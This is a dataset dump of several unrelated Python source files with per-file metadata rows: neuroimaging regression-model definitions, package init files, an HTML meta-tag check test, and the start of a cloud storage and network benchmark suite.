in 2 regressors. """
data_to_use = ['gl_exp_1', 'gl_exp_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0303(self):
""" Gains and losses, diminished by (gaussian) similarity,
in 2 regressors. """
data_to_use = ['gl_gauss_1', 'gl_gauss_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding
# RPE
def model_0401(self):
""" RPE - derived from accuracy. """
data_to_use = ['rpe_acc']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0402(self):
""" RPE - derived from accuracy diminished by (exponential)
similarity. """
data_to_use = ['rpe_acc_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0403(self):
""" RPE - derived from accuracy diminished by (gaussian)
similarity. """
data_to_use = ['rpe_acc_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding
## VALUE
def model_0501(self):
""" Value - derived from accuracy. """
data_to_use = ['value_acc']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0502(self):
""" Value - derived from accuracy diminished by (exponential)
similarity. """
data_to_use = ['value_acc_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0503(self):
""" Value - derived from accuracy diminished by (gaussian)
similarity. """
data_to_use = ['value_acc_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## RPE
def model_0701(self):
""" RPE - derived from gains and loses. """
data_to_use = ['rpe_gl']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0702(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['rpe_gl_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0703(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['rpe_gl_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## VALUE
def model_0801(self):
""" Value - derived from gains and losses. """
data_to_use = ['value_gl']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0802(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['value_gl_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0803(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['value_gl_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## RPE
def model_0901(self):
""" RPE - derived from gains and loses. """
data_to_use = ['rpe_gl_1', 'rpe_gl_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0902(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['rpe_gl_exp_1', 'rpe_gl_exp_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0903(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['rpe_gl_gauss_1', 'rpe_gl_gauss_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## VALUE
def model_1001(self):
""" Value - derived from gains and losses. """
data_to_use = ['value_gl_1', 'value_gl_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1002(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['value_gl_exp_1', 'value_gl_exp_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1003(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['value_gl_gauss_1', 'value_gl_gauss_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# INVERTED VALUES
# --
# Gains and losses INVERTED
def model_1101(self):
""" Gains and losses. Reward coding inversed. """
data_to_use = ['gl_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1102(self):
""" Gains and losses, diminished by (exponential) similarity.
Reward coding inversed. """
data_to_use = ['gl_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1103(self):
""" Gains and losses, diminished by (gaussian) similarity.
Reward coding inversed. """
data_to_use = ['gl_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l into 2 regressors INVERTED
def model_1201(self):
""" Gains and losses, in 2 regressors.
Reward coding inversed. """
data_to_use = ['gl_invert_1', 'gl_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1202(self):
""" Gains and losses, diminished by (exponential) similarity,
in 2 regressors. Reward coding inversed. """
data_to_use = ['gl_exp_invert_1', 'gl_exp_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1203(self):
""" Gains and losses, diminished by (gaussian) similarity,
in 2 regressors. Reward coding inversed. """
data_to_use = ['gl_gauss_invert_1', 'gl_gauss_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding INVERTED
# RPE
def model_1301(self):
""" RPE - derived from accuracy. Reward coding inversed."""
data_to_use = ['rpe_acc_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1302(self):
""" RPE - derived from accuracy diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['rpe_acc_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1303(self):
""" RPE - derived from accuracy diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['rpe_acc_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding
## VALUE
def model_1401(self):
""" Value - derived from accuracy. Reward coding inversed."""
data_to_use = ['value_acc_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1402(self):
""" Value - derived from accuracy diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['value_acc_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1403(self):
""" Value - derived from accuracy diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['value_acc_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## RPE
def model_1601(self):
""" RPE - derived from gains and loses. Reward coding inversed. """
data_to_use = ['rpe_gl_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1602(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1603(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## VALUE
def model_1701(self):
""" Value - derived from gains and losses. Reward coding inversed. """
data_to_use = ['value_gl_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1702(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1703(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## RPE
def model_1801(self):
""" RPE - derived from gains and loses. Reward coding inversed. """
data_to_use = ['rpe_gl_invert_1', 'rpe_gl_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1802(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_exp_invert_1', 'rpe_gl_exp_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1803(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_gauss_invert_1', 'rpe_gl_gauss_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## VALUE
def model_1901(self):
""" Value - derived from gains and losses. Reward coding inversed. """
data_to_use = ['value_gl_invert_1', 'value_gl_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1902(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_exp_invert_1', 'value_gl_exp_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1903(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_gauss_invert_1', 'value_gl_gauss_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# POSTIVE CODING
# --
# Gains and losses INVERTED
def model_2001(self):
""" Gains and losses. Reward coding was positive only. """
data_to_use = ['gl_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2002(self):
""" Gains and losses, diminished by (exponential) similarity.
Reward coding was positive only. """
data_to_use = ['gl_exp_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2003(self):
""" Gains and losses, diminished by (gaussian) similarity.
Reward coding was positive only. """
data_to_use = ['gl_gauss_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l into 2 regressors pos only
def model_2101(self):
""" Gains and losses, in 2 regressors.
Reward coding was positive only. """
data_to_use = ['gl_pos_1', 'gl_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2102(self):
""" Gains and losses, diminished by (exponential) similarity,
in 2 regressors. Reward coding was positive only. """
data_to_use = ['gl_exp_pos_1', 'gl_exp_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2103(self):
""" Gains and losses, diminished by (gaussian) similarity,
in 2 regressors. Reward coding was positive only. """
data_to_use = ['gl_gauss_pos_1', 'gl_gauss_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## RPE
def model_2501(self):
""" RPE - derived from gains and loses.
Reward coding was positive only. """
data_to_use = ['rpe_gl_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2502(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding was positive only. """
data_to_use = ['rpe_gl_exp_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2503(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding was positive only. """
data_to_use = ['rpe_gl_gauss_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## VALUE
def model_2601(self):
""" Value - derived from gains and losses.
Reward coding was positive only. """
data_to_use = ['value_gl_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2602(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. Reward coding was positive only. """
data_to_use = ['value_gl_exp_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2603(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. Reward coding was positive only. """
data_to_use = ['value_gl_gauss_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## RPE
def model_2701(self):
""" RPE - derived from gains and loses.
Reward coding was positive only. """
data_to_use = ['rpe_gl_pos_1', 'rpe_gl_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2702(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding was positive only. """
data_to_use = ['rpe_gl_exp_pos_1', 'rpe_gl_exp_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2703(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding was positive only. """
data_to_use = ['rpe_gl_gauss_pos_1', 'rpe_gl_gauss_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## VALUE
def model_2801(self):
""" Value - derived from gains and losses.
Reward coding was positive only. """
data_to_use = ['value_gl_pos_1', 'value_gl_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2802(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. Reward coding was positive only. """
data_to_use = ['value_gl_exp_pos_1', 'value_gl_exp_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2803(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. Reward coding was positive only. """
data_to_use = ['value_gl_gauss_pos_1', 'value_gl_gauss_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# CONTROL MODELS
def model_29(self):
""" Outcome similarity (exponential). """
data_to_use = ['exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_30(self):
""" Outcome similarity (gaussian). """
data_to_use = ['gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_31(self):
""" Behavoiral/category responses as separate regressors. """
data_to_use = ['resp1', 'resp6']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_32(self):
""" Outcome and contra-outcome similarities (exponential),
as separate regressors. """
data_to_use = ['exp', 'exp_opp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_33(self):
""" Outcome and contra-outcome similarities (gaussian),
as separate regressors. """
data_to_use = ['gauss', 'gauss_opp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_34(self):
""" Gabor angle parameter. """
data_to_use = ['angle']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_35(self):
""" Gabor width parameter. """
data_to_use = ['width']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
| 29.95
| 78
| 0.609235
| 3,590
| 26,356
| 4.209471
| 0.056825
| 0.090524
| 0.135786
| 0.070408
| 0.915365
| 0.910336
| 0.88969
| 0.886911
| 0.871758
| 0.854619
| 0
| 0.01862
| 0.258271
| 26,356
| 879
| 79
| 29.984073
| 0.754412
| 0.253946
| 0
| 0.589147
| 0
| 0
| 0.122346
| 0.009251
| 0
| 0
| 0
| 0
| 0
| 1
| 0.198966
| false
| 0
| 0.002584
| 0
| 0.204134
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
871f6fd87213e1b2222869a5f9bf20984fdc7af2
| 35
|
py
|
Python
|
app/calculator/__init__.py
|
thasmarinho/setic-test-workshop
|
f12c62f55a17f9e6eddb979379e23f3c57953239
|
[
"MIT"
] | 1
|
2020-12-12T17:14:59.000Z
|
2020-12-12T17:14:59.000Z
|
calculator/__init__.py
|
immmdreza/Calculator
|
412484caeb563dd12f4473d0d53a8689ae5ec9c0
|
[
"Apache-2.0"
] | null | null | null |
calculator/__init__.py
|
immmdreza/Calculator
|
412484caeb563dd12f4473d0d53a8689ae5ec9c0
|
[
"Apache-2.0"
] | 1
|
2021-07-11T12:19:09.000Z
|
2021-07-11T12:19:09.000Z
|
from .calculator import Calculator
| 17.5
| 34
| 0.857143
| 4
| 35
| 7.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
873d1f564b8fa7a7506c8db6aa647ab85d1328f2
| 225
|
py
|
Python
|
floss/__init__.py
|
dshunfen/flare-floss
|
4bb366f9895bd191192cb15fd2bfcfbda2755730
|
[
"Apache-2.0"
] | null | null | null |
floss/__init__.py
|
dshunfen/flare-floss
|
4bb366f9895bd191192cb15fd2bfcfbda2755730
|
[
"Apache-2.0"
] | null | null | null |
floss/__init__.py
|
dshunfen/flare-floss
|
4bb366f9895bd191192cb15fd2bfcfbda2755730
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2017 FireEye, Inc. All Rights Reserved.
from __future__ import absolute_import
from .utils import ONE_MB
from .utils import STACK_MEM_NAME
from .utils import makeEmulator
from .utils import removeStackMemory
| 28.125
| 55
| 0.822222
| 32
| 225
| 5.53125
| 0.625
| 0.20339
| 0.338983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020513
| 0.133333
| 225
| 7
| 56
| 32.142857
| 0.887179
| 0.235556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
875e6f91840435fa62d116a12b468c01cfc67dd8
| 752
|
py
|
Python
|
tests/checks/test_meta.py
|
rohan-pednekar/combine
|
23206e1a7a34800acd34beedeea018fb48591633
|
[
"MIT"
] | 5
|
2021-01-25T19:40:04.000Z
|
2022-01-02T13:45:45.000Z
|
tests/checks/test_meta.py
|
rohan-pednekar/combine
|
23206e1a7a34800acd34beedeea018fb48591633
|
[
"MIT"
] | 14
|
2018-07-06T17:19:33.000Z
|
2021-12-22T18:05:57.000Z
|
tests/checks/test_meta.py
|
rohan-pednekar/combine
|
23206e1a7a34800acd34beedeea018fb48591633
|
[
"MIT"
] | 3
|
2019-02-12T10:05:45.000Z
|
2021-11-16T04:32:43.000Z
|
from bs4 import BeautifulSoup
from combine.checks.meta import MetaDescriptionCheck
def test_meta_description_empty_check(snapshot):
content = """<!doctype html>
<html>
<head>
<meta name="description" />
</head>
<body>
</body>
</html>"""
check = MetaDescriptionCheck(BeautifulSoup(content, "html.parser"))
issues = check.run()
snapshot.assert_match(issues.as_data())
def test_meta_description_length_check(snapshot):
content = """<!doctype html>
<html>
<head>
<meta name="description" content="Whoops" />
</head>
<body>
</body>
</html>"""
check = MetaDescriptionCheck(BeautifulSoup(content, "html.parser"))
issues = check.run()
snapshot.assert_match(issues.as_data())
| 23.5
| 71
| 0.666223
| 80
| 752
| 6.1125
| 0.3625
| 0.02863
| 0.04499
| 0.08998
| 0.711656
| 0.711656
| 0.711656
| 0.711656
| 0.711656
| 0.711656
| 0
| 0.001634
| 0.18617
| 752
| 31
| 72
| 24.258065
| 0.797386
| 0
| 0
| 0.769231
| 0
| 0
| 0.349734
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.076923
| false
| 0
| 0.076923
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5e77093914b6e7dc6e493fc31e4737ef2d758102
| 20,000
|
py
|
Python
|
WS2012R2/lisa/tools/middleware_bench/suites/micro.py
|
LiliDeng/lis-test
|
a551326349e1aea86f51678098c747f6a092b4f6
|
[
"Apache-2.0"
] | null | null | null |
WS2012R2/lisa/tools/middleware_bench/suites/micro.py
|
LiliDeng/lis-test
|
a551326349e1aea86f51678098c747f6a092b4f6
|
[
"Apache-2.0"
] | null | null | null |
WS2012R2/lisa/tools/middleware_bench/suites/micro.py
|
LiliDeng/lis-test
|
a551326349e1aea86f51678098c747f6a092b4f6
|
[
"Apache-2.0"
] | null | null | null |
"""
Linux on Hyper-V and Azure Test Code, ver. 1.0.0
Copyright (c) Microsoft Corporation
All rights reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
See the Apache Version 2.0 License for specific language governing
permissions and limitations under the License.
"""
import os
import time
import logging
from utils import constants
from utils import shortcut
from utils.setup import SetupTestEnv
from report.db_utils import upload_results
from report.results_parser import TCPLogsReader, LatencyLogsReader, StorageLogsReader,\
SingleTCPLogsReader, UDPLogsReader, SchedulerLogsReader
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
datefmt='%y/%m/%d %H:%M:%S', level=logging.INFO)
log = logging.getLogger(__name__)
def test_storage(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
instancetype, user, localpath, region, zone, sriov, kernel):
"""
Run FIO storage profile.
:param provider Service provider to be used e.g. azure, aws, gce.
:param keyid: user key for executing remote connection
:param secret: user secret for executing remote connection
:param token: GCE refresh token obtained with gcloud sdk
:param subscription: Azure specific subscription id
:param tenant: Azure specific tenant id
:param projectid: GCE specific project id
:param imageid: AWS OS AMI image id or
Azure image references offer and sku: e.g. 'UbuntuServer#16.04.0-LTS'.
:param instancetype: AWS instance resource type e.g 'd2.4xlarge' or
Azure hardware profile vm size e.g. 'Standard_DS14_v2'.
:param user: remote ssh user for the instance
:param localpath: localpath where the logs should be downloaded, and the
default path for other necessary tools
:param region: EC2 region to connect to
:param zone: EC2 zone where other resources should be available
:param sriov: Enable or disable SR-IOV
:param kernel: custom kernel name provided in localpath
"""
disk_size = 0
raid = 0
if provider == constants.AWS:
disk_size = 2048
device = "aws_device"
elif provider == constants.AZURE:
disk_size = 2048
device = "azure_device"
elif provider == constants.GCE:
disk_size = 167
if raid:
device = constants.RAID_DEV
device = "nvme"
test_env = SetupTestEnv(provider=provider, vm_count=1, test_type=constants.VM_DISK,
disk_size=disk_size, raid=raid, keyid=keyid, secret=secret,
token=token, subscriptionid=subscription, tenantid=tenant,
projectid=projectid, imageid=imageid, instancetype=instancetype,
user=user, localpath=localpath, region=region, zone=zone, sriov=sriov,
kernel=kernel)
test_cmd = '/tmp/run_storage.sh {}'.format(device)
results_path = os.path.join(localpath, 'storage{}_{}.zip'.format(str(time.time()),
instancetype))
test_env.run_test(testname='storage', test_cmd=test_cmd, raid=raid, results_path=results_path,
timeout=constants.TIMEOUT * 2)
upload_results(localpath=localpath, table_name='Perf_{}_Storage'.format(provider),
results_path=results_path, parser=StorageLogsReader,
other_table=('.deb' in kernel),
test_case_name='{}_Storage_perf_tuned_NVME'.format(provider),
provider=provider, region=region, data_path=shortcut.data_path(sriov),
host_type=shortcut.host_type(provider), instance_size=instancetype,
disk_setup='RAID0:{}x{}G'.format(raid, disk_size))
def test_storage_nvme(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
instancetype, user, localpath, region, zone, sriov, kernel):
"""
Run FIO storage profile.
:param provider Service provider to be used e.g. azure, aws, gce.
:param keyid: user key for executing remote connection
:param secret: user secret for executing remote connection
:param token: GCE refresh token obtained with gcloud sdk
:param subscription: Azure specific subscription id
:param tenant: Azure specific tenant id
:param projectid: GCE specific project id
:param imageid: AWS OS AMI image id or
Azure image references offer and sku: e.g. 'UbuntuServer#16.04.0-LTS'.
:param instancetype: AWS instance resource type e.g 'd2.4xlarge' or
Azure hardware profile vm size e.g. 'Standard_DS14_v2'.
:param user: remote ssh user for the instance
:param localpath: localpath where the logs should be downloaded, and the
default path for other necessary tools
:param region: EC2 region to connect to
:param zone: EC2 zone where other resources should be available
:param sriov: Enable or disable SR-IOV
:param kernel: custom kernel name provided in localpath
"""
test_env = SetupTestEnv(provider=provider, vm_count=1, test_type=None,
disk_size=None, raid=False, keyid=keyid, secret=secret,
token=token, subscriptionid=subscription, tenantid=tenant,
projectid=projectid, imageid=imageid, instancetype=instancetype,
user=user, localpath=localpath, region=region, zone=zone, sriov=sriov,
kernel=kernel)
test_cmd = '/tmp/run_storage.sh nvme'
results_path = os.path.join(localpath, 'storage{}_{}.zip'.format(str(time.time()),
instancetype))
test_env.run_test(testname='storage', test_cmd=test_cmd, raid=False, results_path=results_path,
timeout=constants.TIMEOUT * 2)
upload_results(localpath=localpath, table_name='Perf_{}_Storage'.format(provider),
results_path=results_path, parser=StorageLogsReader,
other_table=('.deb' in kernel),
test_case_name='{}_Storage_perf_tuned_NVME'.format(provider),
provider=provider, region=region, data_path=shortcut.data_path(sriov),
host_type=shortcut.host_type(provider), instance_size=instancetype,
disk_setup='NVMe')
def test_network_tcp(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
instancetype, user, localpath, region, zone, sriov, kernel):
"""
Run NTTTCP network TCP profile.
:param provider Service provider to be used e.g. azure, aws, gce.
:param keyid: user key for executing remote connection
:param secret: user secret for executing remote connection
:param token: GCE refresh token obtained with gcloud sdk
:param subscription: Azure specific subscription id
:param tenant: Azure specific tenant id
:param projectid: GCE specific project id
:param imageid: AWS OS AMI image id or
Azure image references offer and sku: e.g. 'UbuntuServer#16.04.0-LTS'.
:param instancetype: AWS instance resource type e.g 'd2.4xlarge' or
Azure hardware profile vm size e.g. 'Standard_DS14_v2'.
:param user: remote ssh user for the instance
:param localpath: localpath where the logs should be downloaded, and the
default path for other necessary tools
:param region: EC2 region to connect to
:param zone: EC2 zone where other resources should be available
:param sriov: Enable or disable SR-IOV
:param kernel: custom kernel name provided in localpath
"""
